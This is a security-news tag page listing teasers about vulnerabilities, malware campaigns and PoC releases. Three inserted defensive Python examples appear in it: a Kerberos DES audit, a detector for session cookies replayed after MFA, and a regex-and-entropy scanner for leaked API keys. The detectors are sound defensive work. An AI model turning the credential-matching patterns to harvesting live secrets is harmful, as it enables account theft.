Google’s FLARE team has released GoStringUngarbler, an open-source tool designed to dismantle string obfuscation in Go binaries protected by the garble compiler. This innovation addresses growing concerns over malware authors exploiting garble’s advanced literal transformations, which render traditional static analysis ineffective.…
Tag: GBHackers Security | #1 Globally Trusted Cyber Security News Platform
CISA Issues Alert on Actively Exploited VMware Vulnerabilities
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) escalated warnings on March 4, 2025, by adding four severe vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. Federal agencies and private organizations are urged to prioritize mitigation efforts, as threat actors…
Cisco Webex for BroadWorks Flaw Opens Door for Attackers to Access Credentials
Cisco Systems has disclosed a security vulnerability in its Webex for BroadWorks unified communications platform that could allow attackers to intercept sensitive credentials and user data under specific configurations. The flaw, tracked as CSCwo20742 and classified as a low-severity issue, impacts organizations…
North Korean IT Workers Exploit GitHub to Launch Global Cyber Attacks
A network of suspected North Korean IT workers is using GitHub to create and backstop fake personas, aiming to infiltrate companies globally, particularly in Japan and the United States. Cybersecurity firm Nisos…
Operation Sea Elephant Targets Organizations to Steal Research Data
A sophisticated Advanced Persistent Threat (APT) group, known as CNC, has been conducting a cyber espionage campaign dubbed “Operation Sea Elephant” targeting scientific research institutions and universities in South Asia. The operation, which aims to steal research data related to…
Beware! Fake CAPTCHA Hidden LummaStealer Threat Installing Silently
Cybersecurity researchers at G DATA have uncovered a sophisticated malware campaign utilizing fake booking websites to deliver the LummaStealer malware through deceptive CAPTCHA prompts. This new attack vector, discovered in January 2025, marks a significant shift in LummaStealer’s distribution methods,…
Over 10,000 WordPress Sites Exposed by Donation Plugin Code Execution Vulnerability
A critical security flaw in the widely used GiveWP – Donation Plugin and Fundraising Platform has left over 10,000 WordPress websites vulnerable to remote code execution attacks since March 3, 2025. Tracked as CVE-2025-0912, the vulnerability allows unauthenticated attackers to hijack sites by…
Cybercriminals Impersonate Electronic Frontier Foundation to Target Gaming Community
A sophisticated phishing campaign targeting the Albion Online gaming community has been uncovered, revealing a complex operation involving impersonation of the Electronic Frontier Foundation (EFF) and deployment of advanced malware. The campaign, discovered on March 4, 2025, showcases the evolving…
U.S. Cracks Down on Nemesis Darknet Admin with New Treasury Sanctions
The U.S. Department of the Treasury has intensified its global campaign against darknet-facilitated drug trafficking by sanctioning Behrouz Parsarad, the Iran-based administrator of the notorious Nemesis Marketplace. The move, announced on March 5, 2025, follows a 2024 international law enforcement…
Telegram EvilVideo Vulnerability Exploited to Run Malicious Code on Victims’ Devices
A newly documented exploitation technique targeting Telegram’s file-sharing infrastructure has raised alarms in cybersecurity circles. Dubbed “EvilVideo,” this attack vector leverages a vulnerability (CVE-2024-7014) in how Telegram processes multimedia content, enabling attackers to disguise malicious HTML files as video files.…
Vim Vulnerability (CVE-2025-27423) Allows Code Execution via Malicious TAR Archives
A high-severity security flaw in the widely used Vim text editor allows attackers to execute arbitrary code on vulnerable systems by tricking users into opening specially crafted TAR archives. Tracked as CVE-2025-27423, this vulnerability has prompted urgent patching efforts and warnings…
Zoho ADSelfService Plus Flaw Allows Hackers to Gain Unauthorized Access
A security flaw in Zoho’s widely used identity management solution, ADSelfService Plus, has been patched after researchers discovered it could enable attackers to hijack user sessions and compromise sensitive enrollment data. Tracked as CVE-2025-1723, the high-severity vulnerability underscores the risks…
PoC Released for HPE Remote Support Tool Vulnerability Allowing Remote Code Execution
Security researchers have released proof-of-concept (PoC) exploit code for critical vulnerabilities in Hewlett Packard Enterprise’s (HPE) Insight Remote Support (IRS) tool, including an unauthenticated XML External Entity (XXE) injection flaw (CVE-2024-53675) and a path traversal-based remote code execution (RCE) vulnerability (CVE-2024-53676). These flaws affect…
NVIDIA Issues Warning About Severe Security Flaws Enabling Code Attacks
NVIDIA has issued an urgent security bulletin urging customers running its Hopper HGX 8-GPU systems to immediately install firmware updates for the HGX Management Controller (HMC) that address two critical vulnerabilities. Released on February 28, 2025, the patches target flaws that could allow attackers to execute…
Windows KDC Proxy RCE Vulnerability Allows Remote Server Takeover
A recently patched remote code execution (RCE) vulnerability in Microsoft Windows’ Key Distribution Center (KDC) Proxy implementation allows unauthenticated attackers to take control of vulnerable servers through manipulated Kerberos authentication traffic. Designated CVE-2024-43639 and rated 9.8 CVSS, this critical flaw stems from…
Chrome 134 Launches with Patches for 14 Crash-Inducing Vulnerabilities
Google has rolled out Chrome 134 to the stable channel for Windows, macOS, and Linux, addressing 14 security vulnerabilities—including high-severity flaws that could enable remote code execution or crashes. The update, version 134.0.6998.35 for Linux, 134.0.6998.35/36 for Windows, and 134.0.6998.44/45 for…
Pathfinder AI – Hunters Announces New AI Capabilities for Smarter SOC Automation
Pathfinder AI expands Hunters’ vision for AI-driven SOCs, introducing Agentic AI for autonomous investigation and response. Hunters, the leader in next-generation SIEM, today announced Pathfinder AI, a major step toward a more AI-driven SOC. Building on Copilot AI, which is…
LLMjacking – Hackers Abuse GenAI With AWS NHIs to Hijack Cloud LLMs
In a concerning development, cybercriminals are increasingly targeting cloud-based generative AI (GenAI) services in a new attack vector dubbed “LLMjacking.” These attacks exploit non-human identities (NHIs) such as machine accounts and API keys to hijack access to large language models (LLMs) hosted…
Google Secretly Tracks Android Devices Even Without User-Opened Apps
A recent technical study conducted by researchers at Trinity College Dublin has revealed that Google collects and stores extensive user data on Android devices, even when pre-installed Google apps are never opened. The findings indicate that cookies, device identifiers, and…
GrassCall Malware Targets Job Seekers to Steal Login Credentials
A newly identified cyberattack campaign, dubbed GrassCall, is targeting job seekers in the cryptocurrency and Web3 sectors through fake job interviews. Attributed to the Russian-speaking cybercriminal group “Crazy Evil,” the campaign uses fraudulent job postings on platforms like LinkedIn, WellFound,…
Researchers Unveil APT28’s Advanced HTA Trojan Obfuscation Tactics
Security researchers have uncovered sophisticated obfuscation techniques employed by APT28, a Russian-linked advanced persistent threat (APT) group, in their HTA (HTML Application) Trojan. The analysis, part of an ongoing investigation into APT28’s cyber espionage campaigns targeting Central Asia and Kazakhstan,…
Microsoft Removing DES Encryption from Windows 11 24H2 and Windows Server 2025
Microsoft has announced the removal of the Data Encryption Standard (DES) encryption algorithm from Kerberos in Windows 11 version 24H2 and Windows Server 2025. This change, set to take effect with updates released on or after September 9, 2025, aims…
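Before the DES bits disappear from the KDC, the accounts that still depend on them need to be found. The following audit is an added example for this listing, not Microsoft's code and not from the article: it decodes the msDS-SupportedEncryptionTypes bitmask and the USE_DES_KEY_ONLY bit of userAccountControl (both Microsoft-documented values) over a constructed set of account records that stands in for an LDAP query.

```python
"""Audit Active Directory accounts for Kerberos DES dependencies.

Added example for this listing; it is not Microsoft's code and not from
the article. The bit values of msDS-SupportedEncryptionTypes and the
USE_DES_KEY_ONLY bit of userAccountControl are Microsoft-documented; the
account records below are constructed, standing in for an LDAP query.
"""

# msDS-SupportedEncryptionTypes bit flags.
DES_CBC_CRC = 0x01
DES_CBC_MD5 = 0x02
RC4_HMAC = 0x04
AES128_CTS_HMAC_SHA1_96 = 0x08
AES256_CTS_HMAC_SHA1_96 = 0x10

DES_BITS = DES_CBC_CRC | DES_CBC_MD5
STRONG_BITS = AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96

# userAccountControl flag that forces DES keys for the account.
USE_DES_KEY_ONLY = 0x200000

FLAG_NAMES = {
    DES_CBC_CRC: "DES_CBC_CRC",
    DES_CBC_MD5: "DES_CBC_MD5",
    RC4_HMAC: "RC4_HMAC",
    AES128_CTS_HMAC_SHA1_96: "AES128_CTS_HMAC_SHA1_96",
    AES256_CTS_HMAC_SHA1_96: "AES256_CTS_HMAC_SHA1_96",
}


def decode_enctypes(value):
    """Return the names of the encryption types enabled in a bitmask."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if value & bit]


def audit_account(acct):
    """Classify one account; returns (severity, reason) or None if clean."""
    name = acct["sAMAccountName"]
    uac = acct.get("userAccountControl", 0)
    enctypes = acct.get("msDS-SupportedEncryptionTypes")

    if uac & USE_DES_KEY_ONLY:
        return ("high", f"{name}: USE_DES_KEY_ONLY is set; Kerberos authentication "
                        "fails once DES is removed")
    if enctypes is None:
        # Attribute unset: the KDC applies the domain default, so the account
        # must be checked against policy rather than assumed safe.
        return ("info", f"{name}: msDS-SupportedEncryptionTypes not set; "
                        "domain default applies")
    if enctypes & DES_BITS:
        if enctypes & STRONG_BITS:
            strong = ", ".join(decode_enctypes(enctypes & STRONG_BITS))
            return ("medium", f"{name}: DES still allowed alongside {strong}; "
                              "clear the DES bits")
        return ("high", f"{name}: DES-only ({', '.join(decode_enctypes(enctypes))}); "
                        "re-key with AES before the September 2025 updates")
    return None


def audit(accounts):
    """Run audit_account over a list of records, dropping clean accounts."""
    return [r for r in (audit_account(a) for a in accounts) if r is not None]


# Constructed sample records (not real directory data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-legacy", "msDS-SupportedEncryptionTypes": 0x03,
     "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-mixed", "msDS-SupportedEncryptionTypes": 0x1F,
     "userAccountControl": 0x10200},
    {"sAMAccountName": "WEB01$", "msDS-SupportedEncryptionTypes": 0x18,
     "userAccountControl": 0x1000},
    {"sAMAccountName": "svc-old",
     "userAccountControl": 0x10200 | USE_DES_KEY_ONLY},
]

if __name__ == "__main__":
    for severity, reason in audit(SAMPLE_ACCOUNTS):
        print(f"[{severity}] {reason}")
```

Accounts with the attribute unset are reported separately because the KDC then falls back to the domain default, which is policy-dependent and worth confirming rather than assuming.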
Hackers Exploiting Business Relationships to Attack Arab Emirates Aviation Sector
A sophisticated cyber espionage campaign targeting the aviation and satellite communications sectors in the United Arab Emirates has been uncovered by Proofpoint researchers. The operation, attributed to a threat cluster dubbed “UNK_CraftyCamel,” demonstrates advanced techniques, including leveraging trusted business relationships…
Microsoft Strengthens Trust Boundary for VBS Enclaves
Microsoft has introduced a series of technical recommendations to bolster the security of Virtualization-Based Security (VBS) enclaves, a key component of trusted execution environments (TEE). VBS enclaves leverage the hypervisor’s Virtual Trust Levels (VTLs) to isolate sensitive memory and code…
Hunters International Claims Tata Technologies Cyberattack
Multinational engineering and technology services firm Tata Technologies has reportedly fallen victim to a significant cyberattack claimed by the ransomware group Hunters International. According to recent social media reports, the breach allegedly resulted in the theft of 1.4 terabytes of…
Google, Meta, and Apple Power the World’s Biggest Surveillance System
Imagine a government that tracks your daily movements, monitors your communications, and catalogs your digital habits. While this conjures images of authoritarian regimes, a parallel reality exists in the United States, where law enforcement agencies leverage the vast data reservoirs…
Authorities Seize $31 Million Linked to Crypto Exchange Hack
U.S. authorities announced the seizure of $31 million tied to the 2021 Uranium Finance decentralized finance (DeFi) exploits. The coordinated effort between the U.S. Attorney’s Office for the Southern District of New York (SDNY) and Homeland Security Investigations (HSI) San…
Docusnap for Windows Flaw Exposes Sensitive Data to Attackers
A recently disclosed vulnerability in Docusnap’s Windows client software (CVE-2025-26849) enables attackers to decrypt sensitive system inventory files through a hardcoded encryption key, exposing critical network information to potential exploitation. Cybersecurity researchers at RedTeam Pentesting GmbH revealed that inventory files…
CISA Warns of Active Exploitation of Microsoft Windows Win32k Vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2018-8639, a six-year-old Microsoft Windows privilege escalation flaw, to its Known Exploited Vulnerabilities (KEV) catalog amid confirmed active attacks. First patched by Microsoft in December 2018, this Win32k kernel-mode driver vulnerability…
Update Alert: Google Warns of Critical Android Vulnerabilities Under Exploit
Google’s March 2025 Android Security Bulletin has unveiled two critical vulnerabilities—CVE-2024-43093 and CVE-2024-50302—currently under limited, targeted exploitation. These flaws, impacting Android versions 12 through 15, underscore escalating risks for billions of devices. The bulletin mandates the immediate installation of the…
BigAnt Server 0-Day Vulnerability Lets Attackers Run Malicious Code Remotely
A critical vulnerability in BigAntSoft’s enterprise chat server software has exposed roughly 50 internet-facing systems to unauthenticated remote code execution attacks. Designated CVE-2025-0364, the flaw anchors an exploit chain that lets attackers bypass authentication, create administrative accounts, and execute malicious PHP code on vulnerable…
Bubba AI, Inc. is Launching Comp AI to Help 100,000 Startups Get SOC 2 Compliant by 2032.
With the growing importance of security compliance for startups, more companies are seeking to achieve and maintain compliance with frameworks like SOC 2, ISO 27001 & GDPR. Bubba AI, Inc. is building a comprehensive solution for these organizations to easily…
Progress WhatsUp Gold Path Traversal Vulnerability Exposes Systems to Remote code Execution
A newly disclosed path traversal vulnerability (CVE-2024-4885) in Progress Software’s WhatsUp Gold network monitoring solution has raised alarms across the cybersecurity community. Rated as critical, this flaw enables unauthenticated attackers to execute arbitrary code on affected systems by exploiting improper…
IBM Storage Virtualize Flaws Allow Remote Code Execution
Two critical security flaws in IBM Storage Virtualize products could enable attackers to bypass authentication protections and execute malicious code on enterprise storage systems, according to a security bulletin issued by the company. Tracked as CVE-2025-0159 and CVE-2025-0160, these vulnerabilities…
CISA Alerts on Active Exploitation of Cisco Small Business Router Flaw
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent warning on March 3, 2025, about active exploitation of a command injection vulnerability (CVE-2023-20118) affecting end-of-life Cisco Small Business RV Series Routers. The flaw, which carries a CVSSv3.1 score…
Routers Under Attack as Scanning Attacks on IoT and Networks Surge to Record Highs
In a concerning trend, the frequency of scanning attacks targeting Internet of Things (IoT) devices and network routers has surged dramatically, reaching unprecedented levels. According to recent data from F5 Labs, the total number of scanning events increased by 91%…
33.3 Million Cyber Attacks Targeted Mobile Devices in 2024 as Threats Surge
Kaspersky’s latest report on mobile malware evolution in 2024 reveals a significant increase in cyber threats targeting mobile devices. The security firm’s products blocked a staggering 33.3 million attacks involving malware, adware, or unwanted mobile software throughout the year. Mobile…
Threat Actors Exploiting AES Encryption for Stealthy Payload Protection
Cybersecurity researchers have uncovered a surge in the use of Advanced Encryption Standard (AES) encryption by threat actors to shield malicious payloads from detection. This technique, combined with code virtualization and staged payload delivery, is being employed by malware families…
Google Launches Shielded Email to Keep Your Address Hidden from Apps
Google is rolling out a new privacy-focused feature called Shielded Email, designed to prevent apps and services from accessing users’ primary email addresses during sign-ups. The feature, first discovered in a Google Play Services APK teardown by Android Authority months ago, will generate…
JavaGhost: Exploiting Amazon IAM Permissions for Phishing Attacks
Unit 42 researchers have observed a threat actor group known as JavaGhost exploiting misconfigurations in Amazon Web Services (AWS) environments to conduct sophisticated phishing campaigns. Active for over five years, JavaGhost has pivoted from website defacement to leveraging compromised cloud…
Hackers Using PowerShell and Microsoft Legitimate Apps to Deploy Malware
Cybersecurity experts are warning of an increasing trend in fileless attacks, where hackers leverage PowerShell and legitimate Microsoft applications to deploy malware without leaving significant traces on compromised systems. These sophisticated attacks, which have been around for over two decades,…
U.S. Suspends Cyberattacks Against Russia
The United States has suspended offensive cyber operations against Russia under an order issued by Defense Secretary Pete Hegseth, according to multiple confirmed reports. The directive, first revealed by The Record and corroborated by The New York Times and The Washington Post, marks a notable…
New Poco RAT Via Weaponized PDF Attacking Users to Capture Sensitive Data
A new variant of malware, dubbed “Poco RAT,” has emerged as a potent espionage tool in a campaign targeting Spanish-speaking users in Latin America. Security researchers at Positive Technologies Expert Security Center (PT ESC) have linked this malware to the…
Space Pirates Hackers Attacking IT Organizations With LuckyStrike Using OneDrive
A recent investigation by cybersecurity experts has unveiled a series of advanced cyberattacks orchestrated by the notorious Advanced Persistent Threat (APT) group known as “Space Pirates.” Leveraging their customized malware arsenal, including the LuckyStrike Agent backdoor, the group has been…
Paragon Partition Manager Vulnerabilities Allow Attackers to Escalate Privileges and Trigger DoS Attacks
Security researchers have uncovered five significant vulnerabilities in Paragon Partition Manager’s BioNTdrv.sys driver, affecting versions prior to 2.0.0. These flaws, identified as CVE-2025-0285, CVE-2025-0286, CVE-2025-0287, CVE-2025-0288, and CVE-2025-0289, pose serious security risks, enabling attackers to escalate privileges to SYSTEM level…
North Korean IT Workers Hide Their IPs Using Astrill VPN
Security researchers have uncovered new evidence that North Korean threat actors, particularly the Lazarus Group, are actively using Astrill VPN to conceal their true IP addresses during cyberattacks and fraudulent IT worker schemes. Silent Push, a cybersecurity firm, recently acquired…
Njrat Exploits Microsoft Dev Tunnels for C2 Communication
A new campaign involving the notorious remote access trojan (RAT) Njrat has been uncovered, leveraging Microsoft’s Dev Tunnels service for command-and-control (C2) communication. This service, intended to help developers securely expose local services to the internet for testing and debugging,…
Hackers Abused Google and PayPal’s Infrastructure to Steal Users Personal Data
Cybersecurity researchers have uncovered a sophisticated phishing campaign leveraging Google Ads and PayPal’s infrastructure to deceive users and steal sensitive personal data. The attackers exploited gaps in Google’s ad policies and abused PayPal’s “no-code checkout” feature to create fraudulent payment links…
Substack Custom Domain Vulnerability Exposes Thousands to Potential Hijacking
A newly disclosed vulnerability in Substack’s custom domain setup could allow malicious actors to hijack inactive subdomains, putting thousands of blogs at risk of serving unauthorized content. The flaw, discovered by an independent security researcher, exploits misconfigured DNS records to…
US Military Personnel Arrested for Hacking 15 Telecom Providers
Federal prosecutors have filed a detention memorandum urging the court to indefinitely detain Cameron John Wagenius, a 21-year-old active-duty U.S. Army soldier stationed at Fort Cavazos, Texas, following his alleged involvement in a multi-state cybercrime campaign targeting at least 15…
PoC Released for Windows Hyper-V SYSTEM Privilege Exploit
Security researchers have publicly disclosed a proof-of-concept (PoC) exploit for CVE-2025-21333, a critical elevation-of-privilege vulnerability in Microsoft’s Hyper-V virtualization framework. The vulnerability resides in the vkrnlintvsp.sys driver and enables local attackers to gain SYSTEM privileges through a sophisticated heap manipulation technique. Microsoft rated this flaw…
Trigon: Latest iOS Kernel Exploit Uncovered
A sophisticated kernel exploit leveraging CVE-2023-32434, an integer overflow vulnerability in Apple’s XNU virtual memory subsystem, has been unveiled by security researchers. Dubbed Trigon, this exploit chain enables deterministic kernel read/write primitives on A10(X) devices, bypassing Apple’s KTRR and PPL protections…
Network Penetration Testing Checklist – 2025
Network penetration testing is a cybersecurity practice that simulates cyberattacks on an organization’s network to identify vulnerabilities and improve security defenses. Ethical hackers, or penetration testers, use tools and techniques to mimic real-world hacking attempts, targeting network components like routers,…
Hacktivist Groups Emerge With Powerful Tools for Large-Scale Cyber Operations
Hacktivism, once synonymous with symbolic website defacements and distributed denial-of-service (DDoS) attacks, has evolved into a sophisticated tool for cyber warfare and influence operations. Recent research highlights how state-sponsored actors are increasingly leveraging hacktivist tactics to conduct large-scale cyber campaigns,…
Chinese Hackers Breach Belgium State Security Service as Investigation Continues
Belgium’s State Security Service (VSSE) has suffered what is being described as its most severe security breach to date. For nearly two years, a group of Chinese hackers exploited a vulnerability in Barracuda’s Email Security Gateway Appliance, a cybersecurity tool…
New Pass-the-Cookie Attacks Bypass MFA, Giving Hackers Full Account Access
Multi-factor authentication (MFA), long considered a cornerstone of cybersecurity defense, is facing a formidable new threat: “Pass-the-Cookie” attacks. Recent findings from Long Wall show that threat actors steal and replay browser session cookies to bypass MFA entirely, granting full access to corporate…
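A replayed cookie does not trigger a new MFA prompt, so the signal has to come from the session itself: the same session id suddenly used from a different IP address and a different browser, with no fresh sign-in in between. The detector below is an added example, not Long Wall's code and not from the article; the key=value log layout and the six events are constructed, and the field names (user, session, ip, ua, mfa, event) are assumptions to map onto whatever the identity provider emits.

```python
"""Flag session cookies replayed from a different client after MFA.

Added example, not from Long Wall or the article. The log format below is
a constructed key=value layout; map your identity provider's sign-in and
activity events onto the same fields (user, session, ip, ua, mfa, event).
"""

import shlex

# Constructed sample events: alice's MFA-backed session is later reused
# from another IP and browser without a new sign-in; bob's is not.
SAMPLE_LOG = """\
2025-03-04T09:00:01Z user=alice session=s1a2 ip=203.0.113.10 ua="Chrome/122 Windows" mfa=passed event=login
2025-03-04T09:05:12Z user=alice session=s1a2 ip=203.0.113.10 ua="Chrome/122 Windows" event=mail.read
2025-03-04T09:10:00Z user=bob session=b9c8 ip=192.0.2.5 ua="Safari/17 macOS" mfa=passed event=login
2025-03-04T09:30:00Z user=bob session=b9c8 ip=192.0.2.5 ua="Safari/17 macOS" event=files.list
2025-03-04T11:42:30Z user=alice session=s1a2 ip=198.51.100.77 ua="Firefox/115 Linux" event=mail.read
2025-03-04T11:43:02Z user=alice session=s1a2 ip=198.51.100.77 ua="Firefox/115 Linux" event=mailbox.rule.create
"""


def parse_line(line):
    """Turn 'ts k=v k="v v"' into a dict; quoted values may contain spaces."""
    tokens = shlex.split(line)
    event = {"ts": tokens[0]}
    for tok in tokens[1:]:
        key, _, value = tok.partition("=")
        event[key] = value
    return event


def detect_cookie_replay(log_text):
    """Return one alert per session first seen from a second client.

    A session is bound to the (ip, ua) pair that passed MFA. Any later use
    of the same session id from a different IP *and* a different user agent,
    with no new login in between, is reported as a likely cookie replay.
    """
    origin = {}   # session id -> (user, ip, ua, ts) recorded at MFA login
    alerts = []
    reported = set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        sid = ev["session"]
        if ev.get("event") == "login" and ev.get("mfa") == "passed":
            origin[sid] = (ev["user"], ev["ip"], ev["ua"], ev["ts"])
            continue
        if sid not in origin or sid in reported:
            continue
        user, ip, ua, started = origin[sid]
        if ev["ip"] != ip and ev["ua"] != ua:
            reported.add(sid)
            alerts.append({
                "user": user,
                "session": sid,
                "mfa_client": f"{ip} {ua}",
                "replay_client": f"{ev['ip']} {ev['ua']}",
                "session_started": started,
                "first_replay": ev["ts"],
                "first_action": ev.get("event"),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_cookie_replay(SAMPLE_LOG):
        print(alert)
```

Requiring both the IP and the user agent to change trades recall for precision: an attacker who also copies the victim's user-agent string slips past this rule, so pair it with impossible-travel and IP-reputation checks, and log a hash of the session cookie rather than its raw value.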
Chinese Hackers Exploit Check Point VPN Zero-Day to Target Organizations Globally
A sophisticated cyberespionage campaign linked to Chinese state-sponsored actors has exploited a previously patched Check Point VPN vulnerability (CVE-2024-24919) to infiltrate organizations across Europe, Africa, and the Americas, according to cybersecurity researchers. The attacks, observed between June 2024 and January…
PingAM Java Agent Vulnerability Allows Attackers to Bypass Security
A critical security flaw (CVE-2025-20059) has been identified in supported versions of Ping Identity’s PingAM Java Agent, potentially enabling attackers to bypass policy enforcement and access protected resources. The vulnerability—classified as a Relative Path Traversal (CWE-23) weakness—affects all PingAM Java Agent deployments…
New GitHub Scam Uses Fake “Mods” and “Cracks” to Steal User Data
A sophisticated malware campaign leveraging GitHub repositories disguised as game modifications and cracked software has been uncovered, exposing a dangerous convergence of social engineering tactics and automated credential harvesting. Security researchers identified over 1,100 malicious repositories distributing variants of the Redox…
260 Domains Hosting 5,000 Malicious PDFs to Steal Credit Card Data
Netskope Threat Labs uncovered a sprawling phishing operation involving 260 domains hosting approximately 5,000 malicious PDF files. These documents, disguised as legitimate resources, employ fake CAPTCHA prompts to redirect victims to phishing sites designed to harvest credit card details and…
DeepSeek Data Leak Exposes 12,000 Hardcoded API Keys and Passwords
A sweeping analysis of the Common Crawl dataset—a cornerstone of training data for large language models (LLMs) like DeepSeek—has uncovered 11,908 live API keys, passwords, and credentials embedded in publicly accessible web pages. The leaked secrets, which authenticate successfully with…
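Finding credentials in crawled HTML comes down to two kinds of match: provider-specific key shapes that can be recognised directly, and generic "name = value" assignments that need an entropy filter so that placeholders such as changeme are not reported. The scanner below is an added example, not the tool used in the cited analysis and not DeepSeek or Common Crawl code; the three pages are constructed, the AWS key on the first is Amazon's documented placeholder AKIAIOSFODNN7EXAMPLE, and the other values are made up.

```python
"""Scan crawled web pages for leaked credentials.

Added example, not the tool used in the cited analysis and not DeepSeek
or Common Crawl code. The three pages below are constructed; the AWS key
on the first is Amazon's documented placeholder (AKIAIOSFODNN7EXAMPLE),
and the other values are made up. Real pipelines read WARC records from
the crawl and then verify hits against the issuing service.
"""

import math
import re
from collections import Counter

# Constructed sample pages: (url, html).
SAMPLE_PAGES = [
    ("https://example.com/app.js",
     'const cfg = { region: "us-east-1", accessKeyId: "AKIAIOSFODNN7EXAMPLE" };'),
    ("https://example.org/setup.html",
     '<pre>password = "changeme_changeme"</pre>'),
    ("https://example.net/client.html",
     '<script>var api_key = "q7Rz2mXp9vK4dLw8Tn3Ab6Yc";</script>'),
]

# Provider-specific key shapes can be matched directly.
AWS_ACCESS_KEY_ID = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")
# Generic "name = value" assignments need an entropy check to cut noise.
GENERIC_ASSIGNMENT = re.compile(
    r"(?i)\b(api[_-]?key|secret|password|token)\b\s*[:=]\s*['\"]?([A-Za-z0-9_\-]{12,})"
)
GENERIC_MIN_ENTROPY = 3.5   # bits per character; placeholders score lower


def shannon_entropy(s):
    """Bits of entropy per character; random-looking secrets score high."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(url, text):
    """Return findings for one document as (url, kind, value, entropy)."""
    findings = []
    for m in AWS_ACCESS_KEY_ID.finditer(text):
        key = m.group(1)
        findings.append((url, "aws_access_key_id", key, round(shannon_entropy(key), 2)))
    for m in GENERIC_ASSIGNMENT.finditer(text):
        value = m.group(2)
        ent = shannon_entropy(value)
        if ent >= GENERIC_MIN_ENTROPY:
            findings.append((url, f"generic:{m.group(1).lower()}", value, round(ent, 2)))
    return findings


def scan_pages(pages):
    """Scan every (url, html) pair and concatenate the findings."""
    results = []
    for url, html in pages:
        results.extend(scan_text(url, html))
    return results


if __name__ == "__main__":
    for url, kind, value, ent in scan_pages(SAMPLE_PAGES):
        print(f"{url}: {kind} {value} (entropy {ent})")
```

The entropy threshold is what separates the live keys the study counted from the far larger number of example strings in tutorials; the next step in a real pipeline is validating each hit against the issuing service, which is how the cited analysis distinguished working credentials from dead ones.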
Winos4.0 Malware Targets Windows Users Through Malicious PDF Files
A new wave of cyberattacks leveraging the Winos4.0 malware framework has targeted organizations in Taiwan through malicious PDF attachments disguised as tax inspection alerts, according to a January 2025 threat analysis by FortiGuard Labs. The campaign employs multi-stage payload delivery,…
Lotus Blossom Hacker Group Uses Dropbox, Twitter, and Zimbra for C2 Communications
The Lotus Blossom hacker group, also known as Spring Dragon, Billbug, or Thrip, has been identified leveraging legitimate cloud services like Dropbox, Twitter, and Zimbra for command-and-control (C2) communications in their cyber espionage campaigns. Cisco Talos researchers attribute these sophisticated…
New Malware Uses Legitimate Antivirus Driver to Bypass All System Protections
In a concerning development, cybersecurity researchers at Trellix have uncovered a sophisticated malware campaign that exploits a legitimate antivirus driver to bypass system protections. The malware, identified as “kill-floor.exe,” leverages the Avast Anti-Rootkit driver (aswArPot.sys) to gain kernel-level access, effectively…
DragonForce Attacks Critical Infrastructure to Exfiltrate Data and Halt Operations
The DragonForce ransomware group has launched a significant cyberattack on critical infrastructure in Saudi Arabia, targeting a prominent real estate and construction company in Riyadh. This marks the first time the group has targeted a major enterprise in the Kingdom,…
Threat Actors Attack Job Seekers of Fortune 500 Companies to Steal Personal Details
In Q3 2024, Cofense Intelligence uncovered a targeted spear-phishing campaign aimed at employees working in social media, marketing, and related roles. The attackers impersonated Fortune 500 companies, including Meta, Coca-Cola, and PayPal, to lure victims into applying for fake job…
Unpatched Vulnerabilities Attract Cybercriminals as EDR Visibility Remains Limited
Cyber adversaries have evolved into highly organized and professional entities, mirroring the operational efficiency of legitimate businesses, according to the CrowdStrike 2025 Global Threat Report. The report highlights a significant shift in the cyber threat landscape during 2024, with attackers…
Squidoor: Multi-Vector Malware Exploiting Outlook API, DNS & ICMP Tunneling for C2
A newly identified malware, dubbed “Squidoor,” has emerged as a sophisticated threat targeting government, defense, telecommunications, education, and aviation sectors in Southeast Asia and South America. Attributed to a suspected Chinese threat actor under the activity cluster CL-STA-0049, Squidoor employs…
WordPress Admins Warned of Fake Plugins Injecting Malicious Links into Websites
A new wave of cyberattacks targeting WordPress websites has been uncovered, with attackers leveraging fake plugins to inject malicious links into site footers. These links, often promoting casino-related spam, compromise website integrity and can severely impact search engine optimization (SEO).…
New Anubis Ransomware Targets Windows, Linux, NAS, and ESXi x64/x32 Environments
A new ransomware group, dubbed Anubis, has emerged as a significant threat in the cybersecurity landscape. Active since late 2024, Anubis employs advanced techniques and operates across multiple platforms, including Windows, Linux, NAS, and ESXi environments. The group is leveraging…
VS Code Extension with 9 Million Installs Attacks Developers with Malicious Code
Microsoft has removed two widely-used Visual Studio Code (VS Code) extensions, “Material Theme Free” and “Material Theme Icons Free,” from its marketplace after cybersecurity researchers discovered malicious code embedded within them. These extensions, developed by Mattia Astorino (also known as…
Microsoft Defender Leverages Machine Learning to Block Malicious Command Executions
The modern cybersecurity landscape is witnessing an unprecedented surge in sophisticated attack techniques, with adversaries increasingly exploiting legitimate command-line tools to execute malicious actions. To address this evolving threat, Microsoft Defender for Endpoint has enhanced its capabilities to detect and…
RustDoor and Koi Stealer Malware Attack macOS to Steal Login Credentials
A new wave of sophisticated cyberattacks targeting macOS systems has been identified, involving two malware strains, RustDoor and Koi Stealer. These attacks, attributed to North Korea-linked Advanced Persistent Threat (APT) groups, primarily aim at stealing sensitive login credentials and cryptocurrency…
LARVA-208 Hackers Compromise 618 Organizations Stealing Logins and Deploying Ransomware
A newly identified cybercriminal group, LARVA-208, also known as EncryptHub, has successfully infiltrated 618 organizations globally since June 2024, leveraging advanced social engineering techniques to steal credentials and deploy ransomware. According to reports from cybersecurity firms CATALYST and Prodaft, the…
Google’s SafetyCore App Secretly Scans All Photos on Android Devices
Recent revelations about Google’s SafetyCore app have ignited a firestorm of privacy debates, echoing Apple’s recent controversy over photo scanning. The app, silently installed on Android devices via system updates, enables on-device image analysis to detect sensitive content—a feature marketed…
New “nRootTag” Attack Turns 1.5 Billion iPhones into Free Tracking Tools
